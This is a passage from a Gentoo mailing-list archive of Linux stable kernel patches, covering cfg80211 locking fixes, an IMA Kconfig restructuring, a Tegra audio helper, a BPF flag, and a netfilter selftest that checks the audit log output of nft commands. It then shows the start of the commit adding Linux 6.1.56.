++	msg = cfg80211_prepare_cqm(wdev->netdev, NULL, GFP_KERNEL);
+ 	if (!msg)
+-		return;
++		goto unlock;
+ 
+ 	if (nla_put_u32(msg, NL80211_ATTR_CQM_RSSI_THRESHOLD_EVENT,
+ 			rssi_event))
+@@ -18750,14 +18778,15 @@ void cfg80211_cqm_rssi_notify(struct net_device *dev,
+ 				      rssi_level))
+ 		goto nla_put_failure;
+ 
+-	cfg80211_send_cqm(msg, gfp);
++	cfg80211_send_cqm(msg, GFP_KERNEL);
+ 
+-	return;
++	goto unlock;
+ 
+  nla_put_failure:
+ 	nlmsg_free(msg);
++ unlock:
++	wdev_unlock(wdev);
+ }
+-EXPORT_SYMBOL(cfg80211_cqm_rssi_notify);
+ 
+ void cfg80211_cqm_txe_notify(struct net_device *dev,
+ 			     const u8 *peer, u32 num_packets,
+diff --git a/net/wireless/sme.c b/net/wireless/sme.c
+index 6e87d2cd83456..b97834284baef 100644
+--- a/net/wireless/sme.c
++++ b/net/wireless/sme.c
+@@ -5,7 +5,7 @@
+  * (for nl80211's connect() and wext)
+  *
+  * Copyright 2009	Johannes Berg <johannes@sipsolutions.net>
+- * Copyright (C) 2009, 2020, 2022 Intel Corporation. All rights reserved.
++ * Copyright (C) 2009, 2020, 2022-2023 Intel Corporation. All rights reserved.
+  * Copyright 2017	Intel Deutschland GmbH
+  */
+ 
+@@ -1555,6 +1555,7 @@ void cfg80211_autodisconnect_wk(struct work_struct *work)
+ 		container_of(work, struct wireless_dev, disconnect_wk);
+ 	struct cfg80211_registered_device *rdev = wiphy_to_rdev(wdev->wiphy);
+ 
++	wiphy_lock(wdev->wiphy);
+ 	wdev_lock(wdev);
+ 
+ 	if (wdev->conn_owner_nlportid) {
+@@ -1593,4 +1594,5 @@ void cfg80211_autodisconnect_wk(struct work_struct *work)
+ 	}
+ 
+ 	wdev_unlock(wdev);
++	wiphy_unlock(wdev->wiphy);
+ }
+diff --git a/net/wireless/sysfs.c b/net/wireless/sysfs.c
+index 0c3f05c9be27a..4d3b658030105 100644
+--- a/net/wireless/sysfs.c
++++ b/net/wireless/sysfs.c
+@@ -5,7 +5,7 @@
+  *
+  * Copyright 2005-2006	Jiri Benc <jbenc@suse.cz>
+  * Copyright 2006	Johannes Berg <johannes@sipsolutions.net>
+- * Copyright (C) 2020-2021 Intel Corporation
++ * Copyright (C) 2020-2021, 2023 Intel Corporation
+  */
+ 
+ #include <linux/device.h>
+@@ -105,14 +105,18 @@ static int wiphy_suspend(struct device *dev)
+ 			cfg80211_leave_all(rdev);
+ 			cfg80211_process_rdev_events(rdev);
+ 		}
++		cfg80211_process_wiphy_works(rdev);
+ 		if (rdev->ops->suspend)
+ 			ret = rdev_suspend(rdev, rdev->wiphy.wowlan_config);
+ 		if (ret == 1) {
+ 			/* Driver refuse to configure wowlan */
+ 			cfg80211_leave_all(rdev);
+ 			cfg80211_process_rdev_events(rdev);
++			cfg80211_process_wiphy_works(rdev);
+ 			ret = rdev_suspend(rdev, NULL);
+ 		}
++		if (ret == 0)
++			rdev->suspended = true;
+ 	}
+ 	wiphy_unlock(&rdev->wiphy);
+ 	rtnl_unlock();
+@@ -132,6 +136,8 @@ static int wiphy_resume(struct device *dev)
+ 	wiphy_lock(&rdev->wiphy);
+ 	if (rdev->wiphy.registered && rdev->ops->resume)
+ 		ret = rdev_resume(rdev);
++	rdev->suspended = false;
++	schedule_work(&rdev->wiphy_work);
+ 	wiphy_unlock(&rdev->wiphy);
+ 
+ 	if (ret)
+diff --git a/scripts/mod/file2alias.c b/scripts/mod/file2alias.c
+index 80d973144fded..111d5464c12df 100644
+--- a/scripts/mod/file2alias.c
++++ b/scripts/mod/file2alias.c
+@@ -1577,7 +1577,7 @@ void handle_moddevtable(struct module *mod, struct elf_info *info,
+ 	/* First handle the "special" cases */
+ 	if (sym_is(name, namelen, "usb"))
+ 		do_usb_table(symval, sym->st_size, mod);
+-	if (sym_is(name, namelen, "of"))
++	else if (sym_is(name, namelen, "of"))
+ 		do_of_table(symval, sym->st_size, mod);
+ 	else if (sym_is(name, namelen, "pnp"))
+ 		do_pnp_device_entry(symval, sym->st_size, mod);
+diff --git a/security/integrity/ima/Kconfig b/security/integrity/ima/Kconfig
+index c17660bf5f347..6ef7bde551263 100644
+--- a/security/integrity/ima/Kconfig
++++ b/security/integrity/ima/Kconfig
+@@ -29,9 +29,11 @@ config IMA
+ 	  to learn more about IMA.
+ 	  If unsure, say N.
+ 
++if IMA
++
+ config IMA_KEXEC
+ 	bool "Enable carrying the IMA measurement list across a soft boot"
+-	depends on IMA && TCG_TPM && HAVE_IMA_KEXEC
++	depends on TCG_TPM && HAVE_IMA_KEXEC
+ 	default n
+ 	help
+ 	   TPM PCRs are only reset on a hard reboot.  In order to validate
+@@ -43,7 +45,6 @@ config IMA_KEXEC
+ 
+ config IMA_MEASURE_PCR_IDX
+ 	int
+-	depends on IMA
+ 	range 8 14
+ 	default 10
+ 	help
+@@ -53,7 +54,7 @@ config IMA_MEASURE_PCR_IDX
+ 
+ config IMA_LSM_RULES
+ 	bool
+-	depends on IMA && AUDIT && (SECURITY_SELINUX || SECURITY_SMACK || SECURITY_APPARMOR)
++	depends on AUDIT && (SECURITY_SELINUX || SECURITY_SMACK || SECURITY_APPARMOR)
+ 	default y
+ 	help
+ 	  Disabling this option will disregard LSM based policy rules.
+@@ -61,7 +62,6 @@ config IMA_LSM_RULES
+ choice
+ 	prompt "Default template"
+ 	default IMA_NG_TEMPLATE
+-	depends on IMA
+ 	help
+ 	  Select the default IMA measurement template.
+ 
+@@ -80,14 +80,12 @@ endchoice
+ 
+ config IMA_DEFAULT_TEMPLATE
+ 	string
+-	depends on IMA
+ 	default "ima-ng" if IMA_NG_TEMPLATE
+ 	default "ima-sig" if IMA_SIG_TEMPLATE
+ 
+ choice
+ 	prompt "Default integrity hash algorithm"
+ 	default IMA_DEFAULT_HASH_SHA1
+-	depends on IMA
+ 	help
+ 	   Select the default hash algorithm used for the measurement
+ 	   list, integrity appraisal and audit log.  The compiled default
+@@ -117,7 +115,6 @@ endchoice
+ 
+ config IMA_DEFAULT_HASH
+ 	string
+-	depends on IMA
+ 	default "sha1" if IMA_DEFAULT_HASH_SHA1
+ 	default "sha256" if IMA_DEFAULT_HASH_SHA256
+ 	default "sha512" if IMA_DEFAULT_HASH_SHA512
+@@ -126,7 +123,6 @@ config IMA_DEFAULT_HASH
+ 
+ config IMA_WRITE_POLICY
+ 	bool "Enable multiple writes to the IMA policy"
+-	depends on IMA
+ 	default n
+ 	help
+ 	  IMA policy can now be updated multiple times.  The new rules get
+@@ -137,7 +133,6 @@ config IMA_WRITE_POLICY
+ 
+ config IMA_READ_POLICY
+ 	bool "Enable reading back the current IMA policy"
+-	depends on IMA
+ 	default y if IMA_WRITE_POLICY
+ 	default n if !IMA_WRITE_POLICY
+ 	help
+@@ -147,7 +142,6 @@ config IMA_READ_POLICY
+ 
+ config IMA_APPRAISE
+ 	bool "Appraise integrity measurements"
+-	depends on IMA
+ 	default n
+ 	help
+ 	  This option enables local measurement integrity appraisal.
+@@ -268,7 +262,7 @@ config IMA_KEYRINGS_PERMIT_SIGNED_BY_BUILTIN_OR_SECONDARY
+ config IMA_BLACKLIST_KEYRING
+ 	bool "Create IMA machine owner blacklist keyrings (EXPERIMENTAL)"
+ 	depends on SYSTEM_TRUSTED_KEYRING
+-	depends on IMA_TRUSTED_KEYRING
++	depends on INTEGRITY_TRUSTED_KEYRING
+ 	default n
+ 	help
+ 	   This option creates an IMA blacklist keyring, which contains all
+@@ -278,7 +272,7 @@ config IMA_BLACKLIST_KEYRING
+ 
+ config IMA_LOAD_X509
+ 	bool "Load X509 certificate onto the '.ima' trusted keyring"
+-	depends on IMA_TRUSTED_KEYRING
++	depends on INTEGRITY_TRUSTED_KEYRING
+ 	default n
+ 	help
+ 	   File signature verification is based on the public keys
+@@ -303,7 +297,6 @@ config IMA_APPRAISE_SIGNED_INIT
+ 
+ config IMA_MEASURE_ASYMMETRIC_KEYS
+ 	bool
+-	depends on IMA
+ 	depends on ASYMMETRIC_PUBLIC_KEY_SUBTYPE=y
+ 	default y
+ 
+@@ -322,7 +315,8 @@ config IMA_SECURE_AND_OR_TRUSTED_BOOT
+ 
+ config IMA_DISABLE_HTABLE
+ 	bool "Disable htable to allow measurement of duplicate records"
+-	depends on IMA
+ 	default n
+ 	help
+ 	   This option disables htable to allow measurement of duplicate records.
++
++endif
+diff --git a/sound/soc/soc-utils.c b/sound/soc/soc-utils.c
+index a4dba0b751e76..1bbd1d077dfd9 100644
+--- a/sound/soc/soc-utils.c
++++ b/sound/soc/soc-utils.c
+@@ -217,6 +217,7 @@ int snd_soc_dai_is_dummy(struct snd_soc_dai *dai)
+ 		return 1;
+ 	return 0;
+ }
++EXPORT_SYMBOL_GPL(snd_soc_dai_is_dummy);
+ 
+ int snd_soc_component_is_dummy(struct snd_soc_component *component)
+ {
+diff --git a/sound/soc/tegra/tegra_audio_graph_card.c b/sound/soc/tegra/tegra_audio_graph_card.c
+index 1f2c5018bf5ac..4737e776d3837 100644
+--- a/sound/soc/tegra/tegra_audio_graph_card.c
++++ b/sound/soc/tegra/tegra_audio_graph_card.c
+@@ -10,6 +10,7 @@
+ #include <linux/platform_device.h>
+ #include <sound/graph_card.h>
+ #include <sound/pcm_params.h>
++#include <sound/soc-dai.h>
+ 
+ #define MAX_PLLA_OUT0_DIV 128
+ 
+@@ -44,6 +45,21 @@ struct tegra_audio_cdata {
+ 	unsigned int plla_out0_rates[NUM_RATE_TYPE];
+ };
+ 
++static bool need_clk_update(struct snd_soc_dai *dai)
++{
++	if (snd_soc_dai_is_dummy(dai) ||
++	    !dai->driver->ops ||
++	    !dai->driver->name)
++		return false;
++
++	if (strstr(dai->driver->name, "I2S") ||
++	    strstr(dai->driver->name, "DMIC") ||
++	    strstr(dai->driver->name, "DSPK"))
++		return true;
++
++	return false;
++}
++
+ /* Setup PLL clock as per the given sample rate */
+ static int tegra_audio_graph_update_pll(struct snd_pcm_substream *substream,
+ 					struct snd_pcm_hw_params *params)
+@@ -140,19 +156,7 @@ static int tegra_audio_graph_hw_params(struct snd_pcm_substream *substream,
+ 	struct snd_soc_dai *cpu_dai = asoc_rtd_to_cpu(rtd, 0);
+ 	int err;
+ 
+-	/*
+-	 * This gets called for each DAI link (FE or BE) when DPCM is used.
+-	 * We may not want to update PLLA rate for each call. So PLLA update
+-	 * must be restricted to external I/O links (I2S, DMIC or DSPK) since
+-	 * they actually depend on it. I/O modules update their clocks in
+-	 * hw_param() of their respective component driver and PLLA rate
+-	 * update here helps them to derive appropriate rates.
+-	 *
+-	 * TODO: When more HW accelerators get added (like sample rate
+-	 * converter, volume gain controller etc., which don't really
+-	 * depend on PLLA) we need a better way to filter here.
+-	 */
+-	if (cpu_dai->driver->ops && rtd->dai_link->no_pcm) {
++	if (need_clk_update(cpu_dai)) {
+ 		err = tegra_audio_graph_update_pll(substream, params);
+ 		if (err)
+ 			return err;
+diff --git a/tools/include/uapi/linux/bpf.h b/tools/include/uapi/linux/bpf.h
+index 53bc487947197..92dbe89dafbf5 100644
+--- a/tools/include/uapi/linux/bpf.h
++++ b/tools/include/uapi/linux/bpf.h
+@@ -3112,6 +3112,11 @@ union bpf_attr {
+  *		**BPF_FIB_LOOKUP_OUTPUT**
+  *			Perform lookup from an egress perspective (default is
+  *			ingress).
++ *		**BPF_FIB_LOOKUP_SKIP_NEIGH**
++ *			Skip the neighbour table lookup. *params*->dmac
++ *			and *params*->smac will not be set as output. A common
++ *			use case is to call **bpf_redirect_neigh**\ () after
++ *			doing **bpf_fib_lookup**\ ().
+  *
+  *		*ctx* is either **struct xdp_md** for XDP programs or
+  *		**struct sk_buff** tc cls_act programs.
+@@ -6678,6 +6683,7 @@ struct bpf_raw_tracepoint_args {
+ enum {
+ 	BPF_FIB_LOOKUP_DIRECT  = (1U << 0),
+ 	BPF_FIB_LOOKUP_OUTPUT  = (1U << 1),
++	BPF_FIB_LOOKUP_SKIP_NEIGH = (1U << 2),
+ };
+ 
+ enum {
+diff --git a/tools/testing/selftests/netfilter/.gitignore b/tools/testing/selftests/netfilter/.gitignore
+index 4cb887b574138..4b2928e1c19d8 100644
+--- a/tools/testing/selftests/netfilter/.gitignore
++++ b/tools/testing/selftests/netfilter/.gitignore
+@@ -1,3 +1,4 @@
+ # SPDX-License-Identifier: GPL-2.0-only
+ nf-queue
+ connect_close
++audit_logread
+diff --git a/tools/testing/selftests/netfilter/Makefile b/tools/testing/selftests/netfilter/Makefile
+index 3686bfa6c58d7..321db8850da00 100644
+--- a/tools/testing/selftests/netfilter/Makefile
++++ b/tools/testing/selftests/netfilter/Makefile
+@@ -6,13 +6,13 @@ TEST_PROGS := nft_trans_stress.sh nft_fib.sh nft_nat.sh bridge_brouter.sh \
+ 	nft_concat_range.sh nft_conntrack_helper.sh \
+ 	nft_queue.sh nft_meta.sh nf_nat_edemux.sh \
+ 	ipip-conntrack-mtu.sh conntrack_tcp_unreplied.sh \
+-	conntrack_vrf.sh nft_synproxy.sh rpath.sh
++	conntrack_vrf.sh nft_synproxy.sh rpath.sh nft_audit.sh
+ 
+ HOSTPKG_CONFIG := pkg-config
+ 
+ CFLAGS += $(shell $(HOSTPKG_CONFIG) --cflags libmnl 2>/dev/null)
+ LDLIBS += $(shell $(HOSTPKG_CONFIG) --libs libmnl 2>/dev/null || echo -lmnl)
+ 
+-TEST_GEN_FILES =  nf-queue connect_close
++TEST_GEN_FILES =  nf-queue connect_close audit_logread
+ 
+ include ../lib.mk
+diff --git a/tools/testing/selftests/netfilter/audit_logread.c b/tools/testing/selftests/netfilter/audit_logread.c
+new file mode 100644
+index 0000000000000..a0a880fc2d9de
+--- /dev/null
++++ b/tools/testing/selftests/netfilter/audit_logread.c
+@@ -0,0 +1,165 @@
++// SPDX-License-Identifier: GPL-2.0
++
++#define _GNU_SOURCE
++#include <errno.h>
++#include <fcntl.h>
++#include <poll.h>
++#include <signal.h>
++#include <stdint.h>
++#include <stdio.h>
++#include <stdlib.h>
++#include <string.h>
++#include <sys/socket.h>
++#include <unistd.h>
++#include <linux/audit.h>
++#include <linux/netlink.h>
++
++static int fd;
++
++#define MAX_AUDIT_MESSAGE_LENGTH	8970
++struct audit_message {
++	struct nlmsghdr nlh;
++	union {
++		struct audit_status s;
++		char data[MAX_AUDIT_MESSAGE_LENGTH];
++	} u;
++};
++
++int audit_recv(int fd, struct audit_message *rep)
++{
++	struct sockaddr_nl addr;
++	socklen_t addrlen = sizeof(addr);
++	int ret;
++
++	do {
++		ret = recvfrom(fd, rep, sizeof(*rep), 0,
++			       (struct sockaddr *)&addr, &addrlen);
++	} while (ret < 0 && errno == EINTR);
++
++	if (ret < 0 ||
++	    addrlen != sizeof(addr) ||
++	    addr.nl_pid != 0 ||
++	    rep->nlh.nlmsg_type == NLMSG_ERROR) /* short-cut for now */
++		return -1;
++
++	return ret;
++}
++
++int audit_send(int fd, uint16_t type, uint32_t key, uint32_t val)
++{
++	static int seq = 0;
++	struct audit_message msg = {
++		.nlh = {
++			.nlmsg_len   = NLMSG_SPACE(sizeof(msg.u.s)),
++			.nlmsg_type  = type,
++			.nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK,
++			.nlmsg_seq   = ++seq,
++		},
++		.u.s = {
++			.mask    = key,
++			.enabled = key == AUDIT_STATUS_ENABLED ? val : 0,
++			.pid     = key == AUDIT_STATUS_PID ? val : 0,
++		}
++	};
++	struct sockaddr_nl addr = {
++		.nl_family = AF_NETLINK,
++	};
++	int ret;
++
++	do {
++		ret = sendto(fd, &msg, msg.nlh.nlmsg_len, 0,
++			     (struct sockaddr *)&addr, sizeof(addr));
++	} while (ret < 0 && errno == EINTR);
++
++	if (ret != (int)msg.nlh.nlmsg_len)
++		return -1;
++	return 0;
++}
++
++int audit_set(int fd, uint32_t key, uint32_t val)
++{
++	struct audit_message rep = { 0 };
++	int ret;
++
++	ret = audit_send(fd, AUDIT_SET, key, val);
++	if (ret)
++		return ret;
++
++	ret = audit_recv(fd, &rep);
++	if (ret < 0)
++		return ret;
++	return 0;
++}
++
++int readlog(int fd)
++{
++	struct audit_message rep = { 0 };
++	int ret = audit_recv(fd, &rep);
++	const char *sep = "";
++	char *k, *v;
++
++	if (ret < 0)
++		return ret;
++
++	if (rep.nlh.nlmsg_type != AUDIT_NETFILTER_CFG)
++		return 0;
++
++	/* skip the initial "audit(...): " part */
++	strtok(rep.u.data, " ");
++
++	while ((k = strtok(NULL, "="))) {
++		v = strtok(NULL, " ");
++
++		/* these vary and/or are uninteresting, ignore */
++		if (!strcmp(k, "pid") ||
++		    !strcmp(k, "comm") ||
++		    !strcmp(k, "subj"))
++			continue;
++
++		/* strip the varying sequence number */
++		if (!strcmp(k, "table"))
++			*strchrnul(v, ':') = '\0';
++
++		printf("%s%s=%s", sep, k, v);
++		sep = " ";
++	}
++	if (*sep) {
++		printf("\n");
++		fflush(stdout);
++	}
++	return 0;
++}
++
++void cleanup(int sig)
++{
++	audit_set(fd, AUDIT_STATUS_ENABLED, 0);
++	close(fd);
++	if (sig)
++		exit(0);
++}
++
++int main(int argc, char **argv)
++{
++	struct sigaction act = {
++		.sa_handler = cleanup,
++	};
++
++	fd = socket(PF_NETLINK, SOCK_RAW, NETLINK_AUDIT);
++	if (fd < 0) {
++		perror("Can't open netlink socket");
++		return -1;
++	}
++
++	if (sigaction(SIGTERM, &act, NULL) < 0 ||
++	    sigaction(SIGINT, &act, NULL) < 0) {
++		perror("Can't set signal handler");
++		close(fd);
++		return -1;
++	}
++
++	audit_set(fd, AUDIT_STATUS_ENABLED, 1);
++	audit_set(fd, AUDIT_STATUS_PID, getpid());
++
++	while (1)
++		readlog(fd);
++}
+diff --git a/tools/testing/selftests/netfilter/config b/tools/testing/selftests/netfilter/config
+index 4faf2ce021d90..7c42b1b2c69b4 100644
+--- a/tools/testing/selftests/netfilter/config
++++ b/tools/testing/selftests/netfilter/config
+@@ -6,3 +6,4 @@ CONFIG_NFT_REDIR=m
+ CONFIG_NFT_MASQ=m
+ CONFIG_NFT_FLOW_OFFLOAD=m
+ CONFIG_NF_CT_NETLINK=m
++CONFIG_AUDIT=y
+diff --git a/tools/testing/selftests/netfilter/nft_audit.sh b/tools/testing/selftests/netfilter/nft_audit.sh
+new file mode 100755
+index 0000000000000..bb34329e02a7f
+--- /dev/null
++++ b/tools/testing/selftests/netfilter/nft_audit.sh
+@@ -0,0 +1,193 @@
++#!/bin/bash
++# SPDX-License-Identifier: GPL-2.0
++#
++# Check that audit logs generated for nft commands are as expected.
++
++SKIP_RC=4
++RC=0
++
++nft --version >/dev/null 2>&1 || {
++	echo "SKIP: missing nft tool"
++	exit $SKIP_RC
++}
++
++logfile=$(mktemp)
++rulefile=$(mktemp)
++echo "logging into $logfile"
++./audit_logread >"$logfile" &
++logread_pid=$!
++trap 'kill $logread_pid; rm -f $logfile $rulefile' EXIT
++exec 3<"$logfile"
++
++do_test() { # (cmd, log)
++	echo -n "testing for cmd: $1 ... "
++	cat <&3 >/dev/null
++	$1 >/dev/null || exit 1
++	sleep 0.1
++	res=$(diff -a -u <(echo "$2") - <&3)
++	[ $? -eq 0 ] && { echo "OK"; return; }
++	echo "FAIL"
++	grep -v '^\(---\|+++\|@@\)' <<< "$res"
++	((RC--))
++}
++
++nft flush ruleset
++
++# adding tables, chains and rules
++
++for table in t1 t2; do
++	do_test "nft add table $table" \
++	"table=$table family=2 entries=1 op=nft_register_table"
++
++	do_test "nft add chain $table c1" \
++	"table=$table family=2 entries=1 op=nft_register_chain"
++
++	do_test "nft add chain $table c2; add chain $table c3" \
++	"table=$table family=2 entries=2 op=nft_register_chain"
++
++	cmd="add rule $table c1 counter"
++
++	do_test "nft $cmd" \
++	"table=$table family=2 entries=1 op=nft_register_rule"
++
++	do_test "nft $cmd; $cmd" \
++	"table=$table family=2 entries=2 op=nft_register_rule"
++
++	cmd=""
++	sep=""
++	for chain in c2 c3; do
++		for i in {1..3}; do
++			cmd+="$sep add rule $table $chain counter"
++			sep=";"
++		done
++	done
++	do_test "nft $cmd" \
++	"table=$table family=2 entries=6 op=nft_register_rule"
++done
++
++for ((i = 0; i < 500; i++)); do
++	echo "add rule t2 c3 counter accept comment \"rule $i\""
++done >$rulefile
++do_test "nft -f $rulefile" \
++'table=t2 family=2 entries=500 op=nft_register_rule'
++
++# adding sets and elements
++
++settype='type inet_service; counter'
++setelem='{ 22, 80, 443 }'
++setblock="{ $settype; elements = $setelem; }"
++do_test "nft add set t1 s $setblock" \
++"table=t1 family=2 entries=4 op=nft_register_set"
++
++do_test "nft add set t1 s2 $setblock; add set t1 s3 { $settype; }" \
++"table=t1 family=2 entries=5 op=nft_register_set"
++
++do_test "nft add element t1 s3 $setelem" \
++"table=t1 family=2 entries=3 op=nft_register_setelem"
++
++# adding counters
++
++do_test 'nft add counter t1 c1' \
++'table=t1 family=2 entries=1 op=nft_register_obj'
++
++do_test 'nft add counter t2 c1; add counter t2 c2' \
++'table=t2 family=2 entries=2 op=nft_register_obj'
++
++# adding/updating quotas
++
++do_test 'nft add quota t1 q1 { 10 bytes }' \
++'table=t1 family=2 entries=1 op=nft_register_obj'
++
++do_test 'nft add quota t2 q1 { 10 bytes }; add quota t2 q2 { 10 bytes }' \
++'table=t2 family=2 entries=2 op=nft_register_obj'
++
++# changing the quota value triggers obj update path
++do_test 'nft add quota t1 q1 { 20 bytes }' \
++'table=t1 family=2 entries=1 op=nft_register_obj'
++
++# resetting rules
++
++do_test 'nft reset rules t1 c2' \
++'table=t1 family=2 entries=3 op=nft_reset_rule'
++
++do_test 'nft reset rules table t1' \
++'table=t1 family=2 entries=3 op=nft_reset_rule
++table=t1 family=2 entries=3 op=nft_reset_rule
++table=t1 family=2 entries=3 op=nft_reset_rule'
++
++do_test 'nft reset rules t2 c3' \
++'table=t2 family=2 entries=189 op=nft_reset_rule
++table=t2 family=2 entries=188 op=nft_reset_rule
++table=t2 family=2 entries=126 op=nft_reset_rule'
++
++do_test 'nft reset rules t2' \
++'table=t2 family=2 entries=3 op=nft_reset_rule
++table=t2 family=2 entries=3 op=nft_reset_rule
++table=t2 family=2 entries=186 op=nft_reset_rule
++table=t2 family=2 entries=188 op=nft_reset_rule
++table=t2 family=2 entries=129 op=nft_reset_rule'
++
++do_test 'nft reset rules' \
++'table=t1 family=2 entries=3 op=nft_reset_rule
++table=t1 family=2 entries=3 op=nft_reset_rule
++table=t1 family=2 entries=3 op=nft_reset_rule
++table=t2 family=2 entries=3 op=nft_reset_rule
++table=t2 family=2 entries=3 op=nft_reset_rule
++table=t2 family=2 entries=180 op=nft_reset_rule
++table=t2 family=2 entries=188 op=nft_reset_rule
++table=t2 family=2 entries=135 op=nft_reset_rule'
++
++# resetting sets and elements
++
++elem=(22 ,80 ,443)
++relem=""
++for i in {1..3}; do
++	relem+="${elem[((i - 1))]}"
++	do_test "nft reset element t1 s { $relem }" \
++	"table=t1 family=2 entries=$i op=nft_reset_setelem"
++done
++
++do_test 'nft reset set t1 s' \
++'table=t1 family=2 entries=3 op=nft_reset_setelem'
++
++# deleting rules
++
++readarray -t handles < <(nft -a list chain t1 c1 | \
++			 sed -n 's/.*counter.* handle \(.*\)$/\1/p')
++
++do_test "nft delete rule t1 c1 handle ${handles[0]}" \
++'table=t1 family=2 entries=1 op=nft_unregister_rule'
++
++cmd='delete rule t1 c1 handle'
++do_test "nft $cmd ${handles[1]}; $cmd ${handles[2]}" \
++'table=t1 family=2 entries=2 op=nft_unregister_rule'
++
++do_test 'nft flush chain t1 c2' \
++'table=t1 family=2 entries=3 op=nft_unregister_rule'
++
++do_test 'nft flush table t2' \
++'table=t2 family=2 entries=509 op=nft_unregister_rule'
++
++# deleting chains
++
++do_test 'nft delete chain t2 c2' \
++'table=t2 family=2 entries=1 op=nft_unregister_chain'
++
++# deleting sets and elements
++
++do_test 'nft delete element t1 s { 22 }' \
++'table=t1 family=2 entries=1 op=nft_unregister_setelem'
++
++do_test 'nft delete element t1 s { 80, 443 }' \
++'table=t1 family=2 entries=2 op=nft_unregister_setelem'
++
++do_test 'nft flush set t1 s2' \
++'table=t1 family=2 entries=3 op=nft_unregister_setelem'
++
++do_test 'nft delete set t1 s2' \
++'table=t1 family=2 entries=1 op=nft_unregister_set'
++
++do_test 'nft delete set t1 s3' \
++'table=t1 family=2 entries=1 op=nft_unregister_set'
++
++exit $RC


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-10-06 13:18 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-10-06 13:18 UTC (permalink / raw
  To: gentoo-commits

commit:     0fa2adcf7c71594b742f6a33f82f22fca6bcade9
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Fri Oct  6 13:18:06 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Fri Oct  6 13:18:06 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=0fa2adcf

Linux patch 6.1.56

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |     4 +
 1055_linux-6.1.56.patch | 11323 ++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 11327 insertions(+)

diff --git a/0000_README b/0000_README
index 3723582e..b5768a62 100644
--- a/0000_README
+++ b/0000_README
@@ -263,6 +263,10 @@ Patch:  1054_linux-6.1.55.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.55
 
+Patch:  1055_linux-6.1.56.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.56
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1055_linux-6.1.56.patch b/1055_linux-6.1.56.patch
new file mode 100644
index 00000000..c67d69e5
--- /dev/null
+++ b/1055_linux-6.1.56.patch
@@ -0,0 +1,11323 @@
+diff --git a/Documentation/admin-guide/cgroup-v1/memory.rst b/Documentation/admin-guide/cgroup-v1/memory.rst
+index 2524061836acc..40164f2881e17 100644
+--- a/Documentation/admin-guide/cgroup-v1/memory.rst
++++ b/Documentation/admin-guide/cgroup-v1/memory.rst
+@@ -91,8 +91,13 @@ Brief summary of control files.
+  memory.oom_control		     set/show oom controls.
+  memory.numa_stat		     show the number of memory usage per numa
+ 				     node
+- memory.kmem.limit_in_bytes          This knob is deprecated and writing to
+-                                     it will return -ENOTSUPP.
++ memory.kmem.limit_in_bytes          Deprecated knob to set and read the kernel
++                                     memory hard limit. Kernel hard limit is not
++                                     supported since 5.16. Writing any value to
++                                     do file will not have any effect same as if
++                                     nokmem kernel parameter was specified.
++                                     Kernel memory is still charged and reported
++                                     by memory.kmem.usage_in_bytes.
+  memory.kmem.usage_in_bytes          show current kernel memory allocation
+  memory.kmem.failcnt                 show the number of kernel memory usage
+ 				     hits limits
+diff --git a/Makefile b/Makefile
+index 3d839824a7224..9ceda3dad5eb7 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 55
++SUBLEVEL = 56
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm/boot/dts/am335x-guardian.dts b/arch/arm/boot/dts/am335x-guardian.dts
+index f6356266564c8..b357364e93f99 100644
+--- a/arch/arm/boot/dts/am335x-guardian.dts
++++ b/arch/arm/boot/dts/am335x-guardian.dts
+@@ -103,8 +103,9 @@
+ 
+ 	};
+ 
+-	guardian_beeper: dmtimer-pwm@7 {
++	guardian_beeper: pwm-7 {
+ 		compatible = "ti,omap-dmtimer-pwm";
++		#pwm-cells = <3>;
+ 		ti,timers = <&timer7>;
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&guardian_beeper_pins>;
+diff --git a/arch/arm/boot/dts/am3517-evm.dts b/arch/arm/boot/dts/am3517-evm.dts
+index 35b653014f2b0..7bab0a9dadb30 100644
+--- a/arch/arm/boot/dts/am3517-evm.dts
++++ b/arch/arm/boot/dts/am3517-evm.dts
+@@ -150,7 +150,7 @@
+ 		enable-gpios = <&gpio6 22 GPIO_ACTIVE_HIGH>; /* gpio_182 */
+ 	};
+ 
+-	pwm11: dmtimer-pwm@11 {
++	pwm11: pwm-11 {
+ 		compatible = "ti,omap-dmtimer-pwm";
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pwm_pins>;
+diff --git a/arch/arm/boot/dts/bcm4708-linksys-ea6500-v2.dts b/arch/arm/boot/dts/bcm4708-linksys-ea6500-v2.dts
+index f1412ba83defb..0454423fe166c 100644
+--- a/arch/arm/boot/dts/bcm4708-linksys-ea6500-v2.dts
++++ b/arch/arm/boot/dts/bcm4708-linksys-ea6500-v2.dts
+@@ -19,7 +19,8 @@
+ 
+ 	memory@0 {
+ 		device_type = "memory";
+-		reg = <0x00000000 0x08000000>;
++		reg = <0x00000000 0x08000000>,
++		      <0x88000000 0x08000000>;
+ 	};
+ 
+ 	gpio-keys {
+diff --git a/arch/arm/boot/dts/exynos4210-i9100.dts b/arch/arm/boot/dts/exynos4210-i9100.dts
+index bba85011ecc93..53e023fc1cacf 100644
+--- a/arch/arm/boot/dts/exynos4210-i9100.dts
++++ b/arch/arm/boot/dts/exynos4210-i9100.dts
+@@ -201,8 +201,8 @@
+ 			power-on-delay = <10>;
+ 			reset-delay = <10>;
+ 
+-			panel-width-mm = <90>;
+-			panel-height-mm = <154>;
++			panel-width-mm = <56>;
++			panel-height-mm = <93>;
+ 
+ 			display-timings {
